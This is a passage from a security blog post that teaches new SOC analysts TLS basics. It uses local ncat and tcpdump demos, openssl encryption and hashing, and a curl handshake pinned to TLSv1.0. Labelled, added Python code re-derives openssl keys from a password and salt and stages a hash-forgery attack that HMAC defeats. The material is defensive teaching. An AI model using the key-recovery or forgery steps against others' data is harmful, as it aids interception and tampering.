</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Once again, <i>ncat </i>hung.</div></div><div><br /></div><div><div>With this understanding, your next step would be to automate this process. </div><div><br /></div><div>Good Reads:</div><div><a href="https://robertheaton.com/2020/04/27/how-does-a-tcp-reset-attack-work/">https://robertheaton.com/2020/04/27/how-does-a-tcp-reset-attack-work/</a></div><div><a href="https://squidarth.com/article/networking/2020/05/03/tcp-resets.html">https://squidarth.com/article/networking/2020/05/03/tcp-resets.html</a></div><div><a href="https://github.com/robert/how-does-a-tcp-reset-attack-work/blob/master/main.py">https://github.com/robert/how-does-a-tcp-reset-attack-work/blob/master/main.py</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com4tag:blogger.com,1999:blog-7303400454979750101.post-60664922221212927872023-08-09T08:13:00.001-07:002023-08-12T08:05:04.215-07:00Understanding and Decrypting TLS based communication - HTTP over TLS (HTTPS)<p>As a leader in a SOC at a Managed Security Services Provider (MSSP), leading multiple teams, it is always interesting to see how new Analysts may freeze when they hear the communication is encrypted. What many of these new Analysts do not know is that, in some cases, you may be able to decrypt this communication.</p><p>This post provides guidance to these new Analysts, to reduce their fear when faced with Transport Layer Security (TLS) encrypted communication. Do keep in mind that while some TLS communication can be decrypted, there are many organizations which do not decrypt it.</p><p>As a result, let's take the opportunity to learn about TLS (some people still say SSL), starting with 1.0 before we transition to the latest version (at the time of this writing), 1.3. 
A little theory is needed before attempting to decrypt this communication.</p><p>Before going further, let's understand why we might or might not want encryption.</p><p>Here is a client and server session using <i>ncat</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo ncat --verbose --listen 127.0.0.1 80 --nodns</span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Listening on 127.0.0.1:80</span>
<span style="color: white;">Ncat: Connection from 127.0.0.1:55006.</span>
<span style="color: #fcff01;"><b><span>peek-a-boo, I can see you!</span>
<span>Ooops, maybe we should encrypt this session!</span></b></span>
<span style="color: white;">-----------------</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ncat --verbose 127.0.0.1 80</span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 127.0.0.1:80.</span>
<b><span style="color: #fcff01;"><span>peek-a-boo, I can see you!</span>
<span>Ooops, maybe we should encrypt this session!</span></span></b><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>And here is the <i>tcpdump </i>output of that session.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti lo port 80 -A 2>/dev/null </span>
<span style="color: white;">IP 127.0.0.1.55006 > 127.0.0.1.80: Flags [P.], seq 3979765296:3979765323, ack 2665935488, win 512, options [nop,nop,TS val 3445312889 ecr 3445288637], length 27: HTTP</span>
<span style="color: white;">E..O.S@.@..S...........P.6f0.........C.....</span>
<span><span style="color: white;">.[My.Z..</span><b><span style="color: #fcff01;">peek-a-boo, I can see you!</span></b></span>
<span style="color: white;">IP 127.0.0.1.80 > 127.0.0.1.55006: Flags [.], ack 27, win 512, options [nop,nop,TS val 3445312889 ecr 3445312889], length 0</span>
<span style="color: white;">E..4`_@.@..b.........P.......6fK.....(.....</span>
<span style="color: white;">.[My.[My</span>
<span style="color: white;">IP 127.0.0.1.80 > 127.0.0.1.55006: Flags [P.], seq 1:46, ack 27, win 512, options [nop,nop,TS val 3445324807 ecr 3445312889], length 45: HTTP</span>
<span style="color: white;">E..a``@.@..4.........P.......6fK.....U.....</span>
<span><span style="color: white;">.[|..[My</span><b><span style="color: #fcff01;">Ooops, maybe we should encrypt this session!</span></b></span>
<span style="color: white;">IP 127.0.0.1.55006 > 127.0.0.1.80: Flags [.], ack 46, win 512, options [nop,nop,TS val 3445324807 ecr 3445324807], length 0</span>
<span style="color: white;">E..4.T@.@..m...........P.6fK.........(.....</span>
<span style="color: white;">.[|..[|.</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>From a monitoring perspective, the more visibility we have into our enterprise traffic, the better we should be able to monitor it. However, that visibility comes at a cost: cleartext also makes it easier for threat actors on our networks to sniff traffic and to exfiltrate data the same way.</p><p>Let's encrypt this communication. Here are the new <i>ncat </i>sessions.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo ncat --verbose --listen 127.0.0.1 80 --nodns </span><b><span style="color: #fcff01;">--ssl</span></b></span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.</span>
<span style="color: white;">Ncat: SHA-1 fingerprint: 8119 9A0B E2D0 4859 3357 56A2 A873 A544 9BB5 C9BC</span>
<span style="color: white;">Ncat: Listening on 127.0.0.1:80</span>
<span style="color: white;">Ncat: Connection from 127.0.0.1:59900.</span>
<b><span style="color: #fcff01;"><span>Bet you can't see me now :-)</span>
<span>I can see you but the sniffer can't :-D</span></span></b>
<span style="color: white;">-----------------</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ ncat --verbose 127.0.0.1 80 </span><b><span style="color: #fcff01;">--ssl</span></b></span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Subject: CN=127.0.0.1</span>
<span style="color: white;">Ncat: Issuer: CN=127.0.0.1</span>
<span style="color: white;">Ncat: SHA-1 fingerprint: 8119 9A0B E2D0 4859 3357 56A2 A873 A544 9BB5 C9BC</span>
<span style="color: white;">Ncat: Certificate verification failed (self-signed certificate).</span>
<span style="color: white;">Ncat: SSL connection to 127.0.0.1:80.</span>
<span style="color: white;">Ncat: SHA-1 fingerprint: 8119 9A0B E2D0 4859 3357 56A2 A873 A544 9BB5 C9BC</span>
<b><span style="color: #fcff01;"><span>Bet you can't see me now :-)</span>
<span>I can see you but the sniffer can't :-D</span></span></b><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>What does <i>tcpdump </i>see this time around?! Well, we can see the number of bytes sent but not the actual contents, as we could in the unencrypted connection. The "cksum ... (incorrect ...)" notes below are an artifact of checksum offloading on the capturing interface, not of the encryption.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti lo port 80 -v -A 2>/dev/null </span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 56647, offset 0, flags [DF], proto TCP (6), length 103)</span>
<span style="color: white;"> 127.0.0.1.59900 > 127.0.0.1.80: Flags [P.], cksum 0xfe5b (incorrect -> 0xdb9b), seq 2290212426:2290212477, ack 2645254601, win 512, options [nop,nop,TS val 3446108841 ecr 3446083161], length 51: HTTP</span>
<span style="color: white;">E..g.G@.@._G...........P...J..a......[.....</span>
<span style="color: white;">.gr..g.Y........,.?.(..'...dQ..?VF$.v..`x.h....`]K...)(y.u.</span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 31739, offset 0, flags [DF], proto TCP (6), length 52)</span>
<span style="color: white;"> 127.0.0.1.80 > 127.0.0.1.59900: Flags [.], cksum 0xfe28 (incorrect -> 0xa5ae), ack 51, win 512, options [nop,nop,TS val 3446108882 ecr 3446108841], length 0</span>
<span style="color: white;">E..4{.@.@............P....a....}.....(.....</span>
<span style="color: white;">.gr..gr.</span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 31740, offset 0, flags [DF], proto TCP (6), length 114)</span>
<span style="color: white;"> 127.0.0.1.80 > 127.0.0.1.59900: Flags [P.], cksum 0xfe66 (incorrect -> 0x7609), seq 1:63, ack 51, win 512, options [nop,nop,TS val 3446132201 ecr 3446108841], length 62: HTTP</span>
<span style="color: white;">E..r{.@.@............P....a....}.....f.....</span>
<span style="color: white;">.g...gr.....9..../.H3..T..Bvs...,.>.....Jt....r .k..........@.y......U</span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 56648, offset 0, flags [DF], proto TCP (6), length 52)</span>
<span style="color: white;"> 127.0.0.1.59900 > 127.0.0.1.80: Flags [.], cksum 0xfe28 (incorrect -> 0xef18), ack 63, win 512, options [nop,nop,TS val 3446132201 ecr 3446132201], length 0</span>
<span style="color: white;">E..4.H@.@._y...........P...}..b......(.....</span>
<span style="color: white;">.g...g..</span>
</pre></div>
</div><div><br /></div><div><div>With that out of the way, let's get to the theory ...</div></div><div><br /></div><div><div><span style="font-size: large;"><br />Understanding TLS</span> </div></div><div><br />TLS is responsible for providing authentication, encryption and integrity.</div><p>Authentication:<br /> This is where each party verifies who the other claims to be. <br /> In many cases, you are going to find the client verifying (authenticating) the server.<br /> You can also have mutual authentication, where the server also verifies (authenticates) the client.</p><p>Encryption:<br /> This is where the data is encrypted as it flows on the wire.<br /> For example, let's say we had a file with the contents www.securitynik.com.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ echo "www.securitynik.com" > test.txt</span>
<span style="color: white;">$ cat test.txt </span>
<span style="color: white;">www.securitynik.com</span>
</pre></div>
<br /> Now we want to encrypt this content.<div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ </span><span style="color: white;">openssl enc -aes-256-cbc -in test.txt -out test.enc -pbkdf2 -k test -p -e
salt=03A2D1E4F026FCA5
key=4D4D864736E375BCF798E9BC871B0B372246C404490CB6ED30198B808A163093
iv =53DF5134171F4A028D0A8896F156E934</span>
</pre><div><br /></div></div>
</div><div><br /></div><div>After encryption, rather than www.securitynik.com, we see</div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat test.enc </span>
<span style="color: white;">Salted__����&����g���`x��B{e�
l�)k�����
</span>
</pre></div>
</div><div><br /> Obviously, there is not much we can make of the encrypted content. Even if the communication channel is unencrypted, we can still pass this file on the wire without anyone being able to read the original content easily. </div><div><br /></div><div>Below we set up <i>ncat</i> to listen for the incoming file on the server side, and the client then uses the encrypted file as its input.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ </span><span style="color: white;">sudo ncat --verbose --listen 127.0.0.1 80
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on 127.0.0.1:80
Ncat: Connection from 127.0.0.1:47172.
</span><b><span style="color: #fcff01;">Salted__����&����g���`x��B{e�
l�)k�����</span></b><span style="color: white;">
</span>
<span><span style="color: white;">$ ncat --verbose 127.0.0.1 80 </span><b><span style="color: #fcff01;">< test.enc</span><span style="color: white;"> </span></b></span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 127.0.0.1:80.</span>
<span style="color: white;">Ncat: 48 bytes sent, 1 bytes received in 0.10 seconds.</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>When we look on the wire, there is a hint that this communication is encrypted, but nothing much for us to interpret as cleartext. The "Salted__" prefix is the header <i>openssl enc</i> writes in front of its 8-byte salt, so an observer can tell which tool produced the blob, but learns nothing about the content.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ sudo tcpdump -nnti lo port 80 -A 2>/dev/null</span>
<span style="color: white;">IP 127.0.0.1.47172 > 127.0.0.1.80: Flags [S], seq 767404127, win 65495, options [mss 65495,sackOK,TS val 1324986826 ecr 0,nop,wscale 7], length 0
E..<6=@.@..}.........D.P-.._.........0.........
N...........
IP 127.0.0.1.80 > 127.0.0.1.47172: Flags [S.], seq 3419229509, ack 767404128, win 65483, options [mss 65495,sackOK,TS val 1324986826 ecr 1324986826,nop,wscale 7], length 0
E..<..@.@.<..........P.D..ME-..`.....0.........
N...N.......
IP 127.0.0.1.47172 > 127.0.0.1.80: Flags [.], ack 1, win 512, options [nop,nop,TS val 1324986827 ecr 1324986826], length 0
E..46>@.@............D.P-..`..MF.....(.....
N...N...
IP 127.0.0.1.47172 > 127.0.0.1.80: Flags [P.], seq 1:49, ack 1, win 512, options [nop,nop,TS val 1324986827 ecr 1324986826], length 48: HTTP
E..d6?@.@..S.........D.P-..`..MF.....X.....
N...N...</span><b><span style="color: #fcff01;">Salted__.....&....g....`x...B.{.e.
l.)k.........</span></b><span style="color: white;">
</span>
</pre></div>
</div><div><br /></div><div> Because we used symmetric encryption, we only need the same key/password to decrypt the file on the receiver side.</div><div><div> To decrypt, we rerun the command, replacing the <i>"-e"</i> option with <i>"-d"</i>. We also change the input file to be the encrypted file, while writing a new output file with the decrypted content. The same <i>-pbkdf2</i> option must be given on both sides, otherwise a different key is derived from the password and decryption fails.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ </span><span style="color: white;">openssl enc -aes-256-cbc -in test.enc -out test.dec -pbkdf2 -k test -p -d
</span>
<span style="color: white;">$ cat test.dec </span>
<span style="color: white;">www.securitynik.com</span>
</pre></div>
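<p>The key and IV that <i>-p</i> printed are not stored anywhere in the file: both are derived from the password and the 8-byte salt that follows the "Salted__" header. The Python below is an added example, not code from the original post. It re-derives them the way <i>openssl enc -pbkdf2</i> does with its current defaults (PBKDF2-HMAC-SHA256, 10000 iterations, key and IV cut from a single derivation) and parses the file header. The password, salt, key and IV are the values shown above; the ciphertext body is constructed (zero bytes) because the real bytes are not legible on the page, and the defaults are an assumption about the OpenSSL build used.</p>

```python
"""Re-derive the key/IV that 'openssl enc -aes-256-cbc -pbkdf2 -p' printed, and parse its header.

Added example, not code from the original post. Assumes OpenSSL's default
-pbkdf2 parameters (10000 iterations, SHA-256) and uses only hashlib.
"""
import hashlib

# Values taken from the openssl enc output above: the -k password and the salt/key/iv printed by -p.
PASSWORD = b"test"
SALT_HEX = "03A2D1E4F026FCA5"
EXPECTED_KEY_HEX = "4D4D864736E375BCF798E9BC871B0B372246C404490CB6ED30198B808A163093"
EXPECTED_IV_HEX = "53DF5134171F4A028D0A8896F156E934"

MAGIC = b"Salted__"          # 8-byte marker openssl enc writes before the 8-byte salt
HEADER_LEN = len(MAGIC) + 8  # 16 bytes of header in front of the ciphertext


def derive_key_iv(password: bytes, salt: bytes, iterations: int = 10000,
                  key_len: int = 32, iv_len: int = 16) -> tuple:
    """Mirror 'openssl enc -pbkdf2': one PBKDF2-HMAC-SHA256 run of key_len + iv_len bytes,
    the first key_len bytes being the key and the remainder the IV.
    (Assumption: current OpenSSL defaults of -iter 10000 and -md sha256.)"""
    material = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, key_len + iv_len)
    return material[:key_len], material[key_len:]


def parse_openssl_enc(blob: bytes) -> tuple:
    """Split an 'openssl enc' salted file into (salt, ciphertext); reject anything else."""
    if len(blob) < HEADER_LEN or not blob.startswith(MAGIC):
        raise ValueError("not an 'openssl enc' salted file")
    salt, ciphertext = blob[len(MAGIC):HEADER_LEN], blob[HEADER_LEN:]
    if len(ciphertext) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return salt, ciphertext


def keys_from_file(blob: bytes, password: bytes) -> tuple:
    """What a receiver holding the password does first: read the salt, derive key and IV."""
    salt, ciphertext = parse_openssl_enc(blob)
    key, iv = derive_key_iv(password, salt)
    return key, iv, ciphertext


# Constructed sample file: the real header (salt from the -p output) plus a placeholder body of
# 32 zero bytes, matching the 48 bytes ncat and tcpdump reported (16 header + two padded AES blocks).
SAMPLE_FILE = MAGIC + bytes.fromhex(SALT_HEX) + bytes(32)

if __name__ == "__main__":
    key, iv, _ = keys_from_file(SAMPLE_FILE, PASSWORD)
    print("key =", key.hex().upper())
    print("iv  =", iv.hex().upper())
```

<p>The practical point for an analyst: whoever sees the salt on the wire and knows (or guesses) the password can rebuild the key and IV exactly as above. The salt only prevents precomputation; the password strength is what protects the file.</p>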
</div><div><br /></div><div> Awesome, we recovered the file while getting a better understanding of symmetric encryption.<br /><p></p><p>Integrity:<span style="white-space: pre;"> </span><br /> Validation that the data has not been lost, damaged, tampered with or falsified in any way.<br /> Normally, when we talk about integrity, we think simply of a hash function such as MD5, SHA-*, etc.<br /> Let's hash the string "www.securitynik.com"<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ echo -n "www.securitynik.com" | openssl dgst -sha1 </span>
<span style="color: white;">SHA1(stdin)= bc95e341c9912b5e5a257d35de91f8f6d7a84b7a</span></pre></div><p> Now if a threat actor is able to see the string, it can be modified and the hash updated. This way, when the recipient receives the packet and compute the hash, it will match what the threat actor wanted. To mitigate this, Keyed-Hashing for Message Authentication is used via HMAC. With HMAC, along with the hash, we use a password/key.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ echo -n "www.securitynik.com" | openssl dgst -sha1 </span><span style="color: #fcff01;"><b>-hmac "myKey"</b></span>
<span style="color: white;">SHA1(stdin)= 0d109a1ce168f55d38bf4e0066cc6352fcd27815</span>
</pre></div>
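<p>To see the attack and the mitigation side by side, here is an added example in Python, not code from the original post. It computes the same two digests as the <i>openssl dgst</i> commands above, replays the forgery just described against a receiver that only recomputes SHA-1, and shows the same forgery failing against a receiver that checks an HMAC with the key. The message and key are the ones used above; the modified message is constructed, and the constant-time comparison via <i>hmac.compare_digest</i> is an addition the post does not mention.</p>

```python
"""Unkeyed hash versus HMAC for message integrity.

Added example, not code from the original post. Replays the forgery the text
describes (modify the string, recompute the hash) and shows why it fails against
HMAC. Only hashlib and hmac from the standard library are used.
"""
import hashlib
import hmac

MESSAGE = b"www.securitynik.com"   # the string hashed with openssl dgst above
KEY = b"myKey"                     # the key passed to openssl dgst -hmac above


def plain_digest(message: bytes) -> str:
    """Equivalent of: echo -n MESSAGE | openssl dgst -sha1"""
    return hashlib.sha1(message).hexdigest()


def keyed_digest(message: bytes, key: bytes) -> str:
    """Equivalent of: echo -n MESSAGE | openssl dgst -sha1 -hmac KEY"""
    return hmac.new(key, message, hashlib.sha1).hexdigest()


def receiver_check_unkeyed(message: bytes, digest: str) -> bool:
    """Receiver that only recomputes SHA-1: anyone can produce a matching digest."""
    return plain_digest(message) == digest


def receiver_check_hmac(message: bytes, tag: str, key: bytes) -> bool:
    """Receiver that knows the key. compare_digest runs in constant time, so the
    comparison itself does not leak how many leading bytes of the tag were right."""
    return hmac.compare_digest(keyed_digest(message, key), tag)


def attacker_rewrite(message: bytes) -> bytes:
    """The modification the threat actor makes on the wire (constructed)."""
    return message.replace(b"securitynik", b"evil-corp")


def forge_unkeyed(message: bytes) -> tuple:
    """Rewrite the message and recompute the plain hash: the attack the text describes."""
    forged = attacker_rewrite(message)
    return forged, plain_digest(forged)


def forge_against_hmac(message: bytes, old_tag: str) -> tuple:
    """Without the key the attacker cannot recompute the tag; the best they can do
    is keep the original one (an unkeyed SHA-1 of the new message is just as useless)."""
    return attacker_rewrite(message), old_tag


if __name__ == "__main__":
    forged, digest = forge_unkeyed(MESSAGE)
    print("unkeyed receiver accepts forgery:", receiver_check_unkeyed(forged, digest))
    tag = keyed_digest(MESSAGE, KEY)
    forged, replayed = forge_against_hmac(MESSAGE, tag)
    print("HMAC receiver accepts forgery:   ", receiver_check_hmac(forged, replayed, KEY))
```

<p>The same idea is what the TLS record layer relies on: a MAC keyed with a secret both endpoints derived during the handshake, not a bare hash.</p>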
<p></p><p>TLS consists of a Record Protocol and a Handshake Protocol. These are also called layers. The Record Protocol provides confidentiality and integrity. Confidentiality is handled via symmetric cryptography (DES, AES, RC4, etc.) for data encryption. Message integrity is handled via a keyed MAC (HMAC in TLSv1.0 through 1.2) built on a hash function such as SHA or MD5. The Record Protocol may also be used without encryption. When a new connection begins, the Record layer's encryption, hash and compression algorithms are all initialized to null.</p><p>Fragmentation of data into manageable blocks and its reassembly, optional compression/decompression, application of the MAC and encryption/decryption before transmission or after reception are all done by the Record Protocol.</p><p>The Handshake Protocol allows the server and client to authenticate each other and to negotiate the encryption algorithm and cryptographic keys before any application data is transmitted or received.</p><p>While the Record Protocol uses symmetric algorithms for encryption, the Handshake Protocol uses asymmetric algorithms (public key cryptography: RSA, DSS, Diffie-Hellman, etc.). Authentication can be made optional but is generally required. </p><p>Once the channel is encrypted, the data sent by the two endpoints is only visible to those two endpoints. The TLS protocol does not hide the length of the data being transmitted, which is why the encrypted <i>tcpdump</i> output above still showed the record sizes. Do keep in mind that TLS endpoints may pad the length to reduce the effectiveness of traffic analysis techniques.</p><p>To get an understanding of the TLS communications for both TLSv1.0 and TLSv1.3, we will target my domain: www.securitynik.com. If you are wondering why not TLSv1.2 also, well, that falls between 1.0 and 1.3. 
My expectation is that if you understand 1.0 and 1.3, then you have a good understanding of what is in the middle.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sslscan www.securitynik.com | grep --perl-regexp "Subject|Altnames|(TLSv1.0|TLSv1.3)\s+enabled"</span>
<span style="color: white;">Subject: www.securitynik.com</span>
<span style="color: white;">Altnames: DNS:www.securitynik.com</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Interestingly, the above does not show information about the versions of TLS enabled. I lost interest in trying to refine it :-D. The likely cause is that <i>sslscan</i> colours its output with ANSI escape sequences, which sit between the version and the word "enabled" and stop the regular expression from matching; running it with <i>--no-colour</i> avoids this. Let's get this information another way. Copy and paste the output into a text editor such as vi and save it, so you can see the actual output I am interested in.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ cat /tmp/ssl.txt | grep --perl-regexp "Subject|Altnames|(TLSv1.0|TLSv1.3)\s+enabled"</span>
<span style="color: white;">TLSv1.0 enabled</span>
<span style="color: white;">TLSv1.3 enabled</span>
<span style="color: white;">Subject: www.securitynik.com</span>
<span style="color: white;">Altnames: DNS:www.securitynik.com</span>
</pre></div>
</div><div><br /></div><div><div><br /><span style="font-size: medium;"><b>TLSv1.0 <br /></b></span><br />Was launched in January 1999 via RFC 2246.</div><div><br /></div><div>Understanding TLSv1.0 through packet analysis. Let's setup <i>tcpdump</i> to capture the traffic of interest. Note below shows the captured traffic also.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -n -w securitynik_tls1.0.pcap 'tcp port 443 and host www.securitynik.com' -v</span>
<span style="color: white;">tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">Got 338</span>
<span style="color: white;">^C338 packets captured</span>
<span style="color: white;">344 packets received by filter</span>
<span style="color: white;">0 packets dropped by kernel</span>
</pre></div>
</div><div><br /></div><div><div>Here is the <i>curl </i>command line to force curl to use <i>TLSv1.0</i>. The <i>--tlsv1.0</i> option sets the minimum version and <i>--tls-max 1.0</i> the maximum, so together they pin the handshake to exactly TLSv1.0.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ curl --verbose https://www.securitynik.com </span><b><span style="color: #fcff01;">--tlsv1.0 --tls-max 1.0</span></b><span style="color: white;"> | more</span></span>
<span style="color: white;"> % Total % Received % Xferd Average Speed Time Time Time Current</span>
<span style="color: white;"> Dload Upload Total Spent Left Speed</span>
<span style="color: white;"> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 142.251.32.83:443...</span>
<span style="color: white;">* Connected to www.securitynik.com (142.251.32.83) port 443 (#0)</span>
<span style="color: white;">* ALPN: offers h2,http/1.1</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS handshake, Client hello (1):</span>
<span style="color: white;">} [177 bytes data]</span>
<span style="color: white;">* CAfile: /etc/ssl/certs/ca-certificates.crt</span>
<span style="color: white;">* CApath: /etc/ssl/certs</span>
<span style="color: white;">{ [5 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Server hello (2):</span>
<span style="color: white;">{ [100 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Certificate (11):</span>
<span style="color: white;">{ [4212 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Server key exchange (12):</span>
<span style="color: white;">{ [298 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Server finished (14):</span>
<span style="color: white;">{ [4 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS handshake, Client key exchange (16):</span>
<span style="color: white;">} [37 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS change cipher, Change cipher spec (1):</span>
<span style="color: white;">} [1 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS handshake, Finished (20):</span>
<span style="color: white;">} [16 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Finished (20):</span>
<span style="color: white;">{ [16 bytes data]</span>
<span style="color: white;">* SSL connection using TLSv1 / ECDHE-RSA-AES128-SHA</span>
<span style="color: white;">* ALPN: server accepted h2</span>
<span style="color: white;">* Server certificate:</span>
<span style="color: white;">* subject: CN=www.securitynik.com</span>
<span style="color: white;">* start date: May 30 04:44:46 2023 GMT</span>
<span style="color: white;">* expire date: Aug 28 05:31:35 2023 GMT</span>
<span style="color: white;">* subjectAltName: host "www.securitynik.com" matched cert's "www.securitynik.com"</span>
<span style="color: white;">* issuer: C=US; O=Google Trust Services LLC; CN=GTS CA 1D4</span>
<span style="color: white;">* SSL certificate verify ok.</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* using HTTP/2</span>
<span style="color: white;">......</span>
</pre></div>
